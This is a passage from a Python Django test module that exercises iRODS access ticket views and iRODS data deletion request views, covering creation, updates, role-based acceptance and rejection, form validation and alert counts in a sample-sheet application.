'samplesheets:irods_ticket_create',
kwargs={'project': self.project.sodar_uuid},
),
post_data,
)
response = self.client.get(
reverse(
'samplesheets:irods_tickets',
kwargs={'project': self.project.sodar_uuid},
)
)
self.assertEqual(response.context['object_list'].count(), 1)
obj = response.context['object_list'].first()
self.assertEqual(obj.get_date_expires(), post_data['date_expires'])
self.assertEqual(obj.label, post_data['label'])
self.assertEqual(obj.path, post_data['path'])
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsAccessTicketCreateView(
SampleSheetTaskflowMixin, SampleSheetIOMixin, TestTaskflowBase
):
"""Tests for the irods access ticket list view"""
def setUp(self):
super().setUp()
# Make project with owner in Taskflow and Django
self.project, self.owner_as = self._make_project_taskflow(
title='TestProject',
type=PROJECT_TYPE_PROJECT,
parent=self.category,
owner=self.user,
description='description',
)
self.investigation = self._import_isa_from_file(
SHEET_PATH, self.project
)
self.study = self.investigation.studies.first()
self.assay = self.study.assays.first()
# Create iRODS collections
self._make_irods_colls(self.investigation)
self.irods_backend = get_backend_api('omics_irods')
self.assertIsNotNone(self.irods_backend)
self.irods_session = self.irods_backend.get_session()
# Create iRODS track hub collections
assay_path = self.irods_backend.get_path(self.assay)
self.track_hub1 = self._make_track_hub_coll(
self.irods_session, assay_path, 'track1'
)
self.track_hub2 = self._make_track_hub_coll(
self.irods_session, assay_path, 'track2'
)
def test_render(self):
"""Test rendering the irods access ticket create view"""
with self.login(self.user):
response = self.client.get(
reverse(
'samplesheets:irods_ticket_create',
kwargs={'project': self.project.sodar_uuid},
)
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['form'].fields), 3)
self.assertIsNotNone(
response.context['form'].fields.get('date_expires')
)
self.assertIsNotNone(response.context['form'].fields.get('label'))
self.assertIsNotNone(response.context['form'].fields.get('path'))
self.assertEqual(
len(response.context['form'].fields['path'].widget.choices), 2
)
expected = [
(
track_hub.path,
"{} / {}".format(
self.assay.get_display_name(), track_hub.name
),
)
for track_hub in (
self.irods_backend.get_child_colls_by_path(
self.irods_backend.get_path(self.assay)
+ '/'
+ TRACK_HUBS_COLL
)
)
]
self.assertListEqual(
response.context['form'].fields['path'].widget.choices, expected
)
def test_post(self):
"""Test posting the irods access ticket form"""
with self.login(self.user):
self.assertEqual(IrodsAccessTicket.objects.count(), 0)
post_data = {
'path': self.track_hub1,
'date_expires': (
timezone.localtime() + timedelta(days=1)
).strftime('%Y-%m-%d'),
'label': 'TestTicket',
}
response = self.client.post(
reverse(
'samplesheets:irods_ticket_create',
kwargs={'project': self.project.sodar_uuid},
),
post_data,
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_tickets',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(IrodsAccessTicket.objects.count(), 1)
ticket = IrodsAccessTicket.objects.first()
self.assertEqual(
str(list(get_messages(response.wsgi_request))[0]),
'iRODS access ticket "%s" created.' % ticket.get_display_name(),
)
self.assertEqual(
ticket.get_date_expires(), post_data['date_expires']
)
self.assertEqual(ticket.label, post_data['label'])
self.assertEqual(ticket.path, post_data['path'])
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsAccessTicketUpdateView(
SampleSheetTaskflowMixin, SampleSheetIOMixin, TestTaskflowBase
):
"""Tests for the irods access ticket list view"""
def setUp(self):
super().setUp()
# Make project with owner in Taskflow and Django
self.project, self.owner_as = self._make_project_taskflow(
title='TestProject',
type=PROJECT_TYPE_PROJECT,
parent=self.category,
owner=self.user,
description='description',
)
self.investigation = self._import_isa_from_file(
SHEET_PATH, self.project
)
self.study = self.investigation.studies.first()
self.assay = self.study.assays.first()
# Create iRODS collections
self._make_irods_colls(self.investigation)
self.irods_backend = get_backend_api('omics_irods')
self.assertIsNotNone(self.irods_backend)
self.irods_session = self.irods_backend.get_session()
# Create iRODS track hub collections
assay_path = self.irods_backend.get_path(self.assay)
self.track_hub1 = self._make_track_hub_coll(
self.irods_session, assay_path, 'track1'
)
self.track_hub2 = self._make_track_hub_coll(
self.irods_session, assay_path, 'track2'
)
def test_render(self):
"""Test render the irods access ticket update form"""
with self.login(self.user):
self.assertEqual(IrodsAccessTicket.objects.count(), 0)
post_data = {
'path': self.track_hub1,
'date_expires': (
timezone.localtime() + timedelta(days=1)
).strftime('%Y-%m-%d'),
'label': 'TestTicket',
}
self.client.post(
reverse(
'samplesheets:irods_ticket_create',
kwargs={'project': self.project.sodar_uuid},
),
post_data,
)
self.assertEqual(IrodsAccessTicket.objects.count(), 1)
ticket = IrodsAccessTicket.objects.first()
response = self.client.get(
reverse(
'samplesheets:irods_ticket_update',
kwargs={'irodsaccessticket': str(ticket.sodar_uuid)},
)
)
self.assertEqual(
response.context['form'].initial['date_expires'],
ticket.date_expires,
)
self.assertEqual(
response.context['form'].initial['label'], ticket.label
)
self.assertEqual(
response.context['form'].initial['path'], ticket.path
)
def test_post(self):
"""Test posting the irods access ticket update form"""
with self.login(self.user):
self.assertEqual(IrodsAccessTicket.objects.count(), 0)
post_data = {
'path': self.track_hub1,
'date_expires': (
timezone.localtime() + timedelta(days=1)
).strftime('%Y-%m-%d'),
'label': 'TestTicket',
}
self.client.post(
reverse(
'samplesheets:irods_ticket_create',
kwargs={'project': self.project.sodar_uuid},
),
post_data,
)
self.assertEqual(IrodsAccessTicket.objects.count(), 1)
ticket = IrodsAccessTicket.objects.first()
update_data = {
**post_data,
'label': 'TestTicketAltered',
'date_expires': '',
}
response = self.client.post(
reverse(
'samplesheets:irods_ticket_update',
kwargs={'irodsaccessticket': str(ticket.sodar_uuid)},
),
update_data,
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_tickets',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(IrodsAccessTicket.objects.count(), 1)
ticket = IrodsAccessTicket.objects.first()
self.assertEqual(
str(list(get_messages(response.wsgi_request))[1]),
'iRODS access ticket "%s" updated.' % ticket.get_display_name(),
)
self.assertIsNone(ticket.get_date_expires())
self.assertEqual(ticket.label, update_data['label'])
self.assertEqual(ticket.path, update_data['path'])
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsAccessTicketDeleteView(
SampleSheetTaskflowMixin, SampleSheetIOMixin, TestTaskflowBase
):
"""Tests for the irods access ticket delete view"""
def setUp(self):
super().setUp()
# Make project with owner in Taskflow and Django
self.project, self.owner_as = self._make_project_taskflow(
title='TestProject',
type=PROJECT_TYPE_PROJECT,
parent=self.category,
owner=self.user,
description='description',
)
self.investigation = self._import_isa_from_file(
SHEET_PATH, self.project
)
self.study = self.investigation.studies.first()
self.assay = self.study.assays.first()
# Create iRODS collections
self._make_irods_colls(self.investigation)
self.irods_backend = get_backend_api('omics_irods')
self.assertIsNotNone(self.irods_backend)
self.irods_session = self.irods_backend.get_session()
# Create iRODS track hub collections
assay_path = self.irods_backend.get_path(self.assay)
self.track_hub1 = self._make_track_hub_coll(
self.irods_session, assay_path, 'track1'
)
self.track_hub2 = self._make_track_hub_coll(
self.irods_session, assay_path, 'track2'
)
def test_delete(self):
"""Test render the irods access ticket update form"""
with self.login(self.user):
self.assertEqual(IrodsAccessTicket.objects.count(), 0)
post_data = {
'path': self.track_hub1,
'date_expires': (
timezone.localtime() + timedelta(days=1)
).strftime('%Y-%m-%d'),
'label': 'TestTicket',
}
self.client.post(
reverse(
'samplesheets:irods_ticket_create',
kwargs={'project': self.project.sodar_uuid},
),
post_data,
)
self.client.post(
reverse(
'samplesheets:irods_ticket_create',
kwargs={'project': self.project.sodar_uuid},
),
{**post_data, 'path': self.track_hub2},
)
self.assertEqual(IrodsAccessTicket.objects.count(), 2)
ticket = IrodsAccessTicket.objects.first()
response = self.client.post(
reverse(
'samplesheets:irods_ticket_delete',
kwargs={'irodsaccessticket': str(ticket.sodar_uuid)},
),
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_tickets',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(IrodsAccessTicket.objects.count(), 1)
self.assertEqual(
str(list(get_messages(response.wsgi_request))[2]),
'iRODS access ticket "%s" deleted.' % ticket.get_display_name(),
)
class TestIrodsRequestViewsBase(
SampleSheetIOMixin,
SampleSheetTaskflowMixin,
TestTaskflowBase,
):
"""Base test class for iRODS delete requests"""
def _get_create_alert_count(self, user, project=None):
"""
Return alert count for active request create alerts. If project is not
specified, default to self.project.
:param user: User object
:param project: Project object or None
"""
if not project:
project = self.project
return self.app_alert_model.objects.filter(
alert_name=IRODS_REQ_CREATE_ALERT_NAME,
active=True,
project=project,
user=user,
).count()
def setUp(self):
super().setUp()
self.irods_backend = get_backend_api('omics_irods')
self.irods_session = self.irods_backend.get_session()
self.project, self.owner_as = self._make_project_taskflow(
title='TestProject',
type=PROJECT_TYPE_PROJECT,
parent=self.category,
owner=self.user,
description='description',
)
# Import investigation
self.investigation = self._import_isa_from_file(
SHEET_PATH, self.project
)
self.study = self.investigation.studies.first()
self.assay = self.study.assays.first()
# Set up iRODS data
self._make_irods_colls(self.investigation)
self.assay_path = self.irods_backend.get_path(self.assay)
self.path = os.path.join(self.assay_path, TEST_FILE_NAME)
self.path_md5 = os.path.join(self.assay_path, f'{TEST_FILE_NAME}.md5')
# Create objects
self.file_obj = self.irods_session.data_objects.create(self.path)
self.md5_obj = self.irods_session.data_objects.create(self.path_md5)
# Init users (owner = user_cat, superuser = user)
self.user_delegate = self.make_user('user_delegate')
self.user_contrib = self.make_user('user_contrib')
self.user_contrib2 = self.make_user('user_contrib2')
self.user_guest = self.make_user('user_guest')
self._make_assignment_taskflow(
self.project, self.user_delegate, self.role_delegate
)
self._make_assignment_taskflow(
self.project, self.user_contrib, self.role_contributor
)
self._make_assignment_taskflow(
self.project, self.user_contrib2, self.role_contributor
)
self._make_assignment_taskflow(
self.project, self.user_guest, self.role_guest
)
# Get appalerts API and model
self.app_alerts = get_backend_api('appalerts_backend')
self.app_alert_model = self.app_alerts.get_model()
# Set default POST data
self.post_data = {'path': self.path, 'description': 'bla'}
def tearDown(self):
self.irods_session.collections.get('/omicsZone/projects').remove(
force=True
)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestCreateView(TestIrodsRequestViewsBase):
"""Test IrodsRequestCreateView"""
def test_create(self):
"""Test creating a delete request"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
self.assertEqual(self._get_create_alert_count(self.user), 0)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 0)
with self.login(self.user_contrib):
response = self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
obj = IrodsDataRequest.objects.first()
self.assertEqual(
list(get_messages(response.wsgi_request))[0].message,
'iRODS data request "{}" created.'.format(obj.get_display_name()),
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
self.assertEqual(obj.path, self.path)
self.assertEqual(obj.description, 'bla')
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
def test_create_trailing_slash(self):
"""Test creating a delete request with trailing slash in path"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
post_data = {'path': self.path + '/', 'description': 'bla'}
with self.login(self.user_contrib):
response = self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
post_data,
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
obj = IrodsDataRequest.objects.first()
self.assertEqual(
list(get_messages(response.wsgi_request))[0].message,
f'iRODS data request "{obj.get_display_name()}" created.',
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
self.assertEqual(obj.path, self.path)
self.assertEqual(obj.description, 'bla')
def test_create_invalid_form_data(self):
"""Test creating a delete request with invalid form data"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
self.assertEqual(self._get_create_alert_count(self.user), 0)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 0)
post_data = {'path': '/doesnt/exist', 'description': 'bla'}
with self.login(self.user_contrib):
response = self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
post_data,
)
self.assertEqual(
response.context['form'].errors['path'][0],
ERROR_MSG_INVALID_PATH,
)
self.assertEqual(IrodsDataRequest.objects.count(), 0)
self.assertEqual(self._get_create_alert_count(self.user), 0)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 0)
def test_create_invalid_path_assay_collection(self):
"""Test creating a delete request with assay path (should fail)"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
post_data = {'path': self.assay_path, 'description': 'bla'}
with self.login(self.user_contrib):
response = self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
post_data,
)
self.assertEqual(
response.context['form'].errors['path'][0],
ERROR_MSG_INVALID_PATH,
)
self.assertEqual(IrodsDataRequest.objects.count(), 0)
def test_create_multiple(self):
"""Test creating multiple_requests"""
path2 = os.path.join(self.assay_path, TEST_FILE_NAME2)
path2_md5 = os.path.join(self.assay_path, TEST_FILE_NAME2 + '.md5')
self.irods_session.data_objects.create(path2)
self.irods_session.data_objects.create(path2_md5)
self.assertEqual(IrodsDataRequest.objects.count(), 0)
self.assertEqual(self._get_create_alert_count(self.user), 0)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.post_data['path'] = path2
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 2)
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestUpdateView(TestIrodsRequestViewsBase):
"""Test IrodsRequestUpdateView"""
def test_update(self):
"""Test POST request for updating a delete request"""
post_data = {'path': self.path, 'description': 'Description'}
update_data = {'path': self.path, 'description': 'Updated'}
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
response = self.client.post(
reverse(
'samplesheets:irods_request_update',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
update_data,
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
obj = IrodsDataRequest.objects.first()
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
'iRODS data request "{}" updated.'.format(obj.get_display_name()),
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
self.assertEqual(obj.path, self.path)
self.assertEqual(obj.description, 'Updated')
def test_post_update_invalid_form_data(self):
"""Test updating a delete request with invalid form data"""
post_data = {'path': self.path, 'description': 'Description'}
update_data = {'path': '/doesnt/exist', 'description': 'Updated'}
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
response = self.client.post(
reverse(
'samplesheets:irods_request_update',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
update_data,
)
self.assertEqual(
response.context['form'].errors['path'][0],
ERROR_MSG_INVALID_PATH,
)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestDeleteView(TestIrodsRequestViewsBase):
"""Test IrodsRequestUpdateView"""
def test_get_contributor(self):
"""Test GET request for deleting a request"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(
self._get_create_alert_count(self.user_delegate), 1
)
response = self.client.get(
reverse(
'samplesheets:irods_request_delete',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(
self._get_create_alert_count(self.user_delegate), 1
)
def test_delete_contributor(self):
"""Test POST request for deleting a request"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(
self._get_create_alert_count(self.user_delegate), 1
)
response = self.client.post(
reverse(
'samplesheets:irods_request_delete',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
'iRODS data request deleted.',
)
self.assertEqual(IrodsDataRequest.objects.count(), 0)
self.assertEqual(self._get_create_alert_count(self.user), 0)
self.assertEqual(
self._get_create_alert_count(self.user_delegate), 0
)
def test_delete_one_of_multiple(self):
"""Test deleting one of multiple requests"""
path2 = os.path.join(self.assay_path, TEST_FILE_NAME2)
path2_md5 = os.path.join(self.assay_path, TEST_FILE_NAME2 + '.md5')
self.irods_session.data_objects.create(path2)
self.irods_session.data_objects.create(path2_md5)
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.post_data['path'] = path2
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 2)
obj = IrodsDataRequest.objects.first()
# NOTE: Still should only have one request for both
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(
self._get_create_alert_count(self.user_delegate), 1
)
self.client.post(
reverse(
'samplesheets:irods_request_delete',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
# NOTE: After deleting just one the requests, alerts remain
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(
self._get_create_alert_count(self.user_delegate), 1
)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestAcceptView(TestIrodsRequestViewsBase):
"""Test IrodsRequestAcceptView"""
def test_accept_request_doesnt_exist(self):
"""Test accepting a delete request that doesn't exist"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_cat):
response = self.client.post(
reverse(
'samplesheets:irods_request_accept',
kwargs={'irodsdatarequest': DUMMY_UUID},
),
{'confirm': True},
)
self.assertEqual(response.status_code, 404)
def test_accept(self):
"""Test accepting a delete request"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
with self.login(self.user):
response = self.client.post(
reverse(
'samplesheets:irods_request_accept',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
{'confirm': True},
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
'iRODS data request "{}" accepted.'.format(
obj.get_display_name()
),
)
obj = IrodsDataRequest.objects.first()
self.assertEqual(obj.status, 'ACCEPTED')
self.assertEqual(self._get_create_alert_count(self.user), 0)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 0)
def test_accept_invalid_form_data(self):
"""Test accepting a delete request with invalid form data"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
with self.login(self.user):
response = self.client.post(
reverse(
'samplesheets:irods_request_accept',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
{'confirm': False},
)
self.assertEqual(
response.context['form'].errors['confirm'][0],
'This field is required.',
)
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
def test_accept_owner(self):
"""Test accepting a delete request as owner"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
with self.login(self.user_cat):
response = self.client.post(
reverse(
'samplesheets:irods_request_accept',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
{'confirm': True},
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
f'iRODS data request "{obj.get_display_name()}" accepted.',
)
obj = IrodsDataRequest.objects.first()
self.assertEqual(obj.status, 'ACCEPTED')
def test_accept_delegate(self):
"""Test accepting a delete request as delegate"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
with self.login(self.user_delegate):
response = self.client.post(
reverse(
'samplesheets:irods_request_accept',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
{'confirm': True},
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
f'iRODS data request "{obj.get_display_name()}" accepted.',
)
obj = IrodsDataRequest.objects.first()
self.assertEqual(obj.status, 'ACCEPTED')
def test_accept_contributor(self):
"""Test accepting a delete request as contributor"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
response = self.client.post(
reverse(
'samplesheets:irods_request_accept',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
{'confirm': True},
)
self.assertRedirects(response, reverse('home'))
self.assertEqual(IrodsDataRequest.objects.count(), 1)
def test_accept_one_of_multiple(self):
"""Test accepting one of multiple requests"""
path2 = os.path.join(self.assay_path, TEST_FILE_NAME2)
path2_md5 = os.path.join(self.assay_path, TEST_FILE_NAME2 + '.md5')
self.irods_session.data_objects.create(path2)
self.irods_session.data_objects.create(path2_md5)
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.post_data['path'] = path2
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(
IrodsDataRequest.objects.filter(status='ACTIVE').count(), 2
)
obj = IrodsDataRequest.objects.first()
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
with self.login(self.user):
self.client.post(
reverse(
'samplesheets:irods_request_accept',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
{'confirm': True},
)
self.assertEqual(
IrodsDataRequest.objects.filter(status='ACTIVE').count(), 1
)
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestRejectView(TestIrodsRequestViewsBase):
"""Test IrodsRequestRejectView"""
def test_reject_request_doesnt_exist(self):
"""Test GET request for rejecting a delete request that doesn't exist"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_cat):
response = self.client.get(
reverse(
'samplesheets:irods_request_reject',
kwargs={'irodsdatarequest': DUMMY_UUID},
),
)
self.assertEqual(response.status_code, 404)
def test_reject_admin(self):
"""Test GET request for rejecting a delete request"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
with self.login(self.user):
response = self.client.get(
reverse(
'samplesheets:irods_request_reject',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
'iRODS data request "{}" rejected.'.format(
obj.get_display_name()
),
)
obj.refresh_from_db()
self.assertEqual(obj.status, 'REJECTED')
def test_reject_owner(self):
"""Test GET request for rejecting a delete request as owner"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
with self.login(self.user_cat):
response = self.client.get(
reverse(
'samplesheets:irods_request_reject',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
f'iRODS data request "{obj.get_display_name()}" rejected.',
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj.refresh_from_db()
self.assertEqual(obj.status, 'REJECTED')
def test_reject_delegate(self):
"""Test GET request for rejecting a delete request as delegate"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
with self.login(self.user_delegate):
response = self.client.get(
reverse(
'samplesheets:irods_request_reject',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
)
self.assertRedirects(
response,
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
'iRODS data request "{}" rejected.'.format(
obj.get_display_name()
),
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj.refresh_from_db()
self.assertEqual(obj.status, 'REJECTED')
def test_reject_contributor(self):
"""Test GET request for rejecting a delete request as contributor"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
obj = IrodsDataRequest.objects.first()
response = self.client.get(
reverse(
'samplesheets:irods_request_reject',
kwargs={'irodsdatarequest': obj.sodar_uuid},
),
)
self.assertRedirects(response, reverse('home'))
self.assertEqual(
list(get_messages(response.wsgi_request))[-1].message,
'User not authorized for requested action',
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
def test_reject_one_of_multiple(self):
"""Test rejecting one of multiple requests"""
path2 = os.path.join(self.assay_path, TEST_FILE_NAME2)
path2_md5 = os.path.join(self.assay_path, TEST_FILE_NAME2 + '.md5')
self.irods_session.data_objects.create(path2)
self.irods_session.data_objects.create(path2_md5)
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.post_data['path'] = path2
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(
IrodsDataRequest.objects.filter(status='ACTIVE').count(), 2
)
obj = IrodsDataRequest.objects.first()
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
with self.login(self.user):
self.client.get(
reverse(
'samplesheets:irods_request_reject',
kwargs={'irodsdatarequest': obj.sodar_uuid},
)
)
self.assertEqual(
IrodsDataRequest.objects.filter(status='ACTIVE').count(), 1
)
self.assertEqual(self._get_create_alert_count(self.user), 1)
self.assertEqual(self._get_create_alert_count(self.user_delegate), 1)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestIrodsRequestListView(TestIrodsRequestViewsBase):
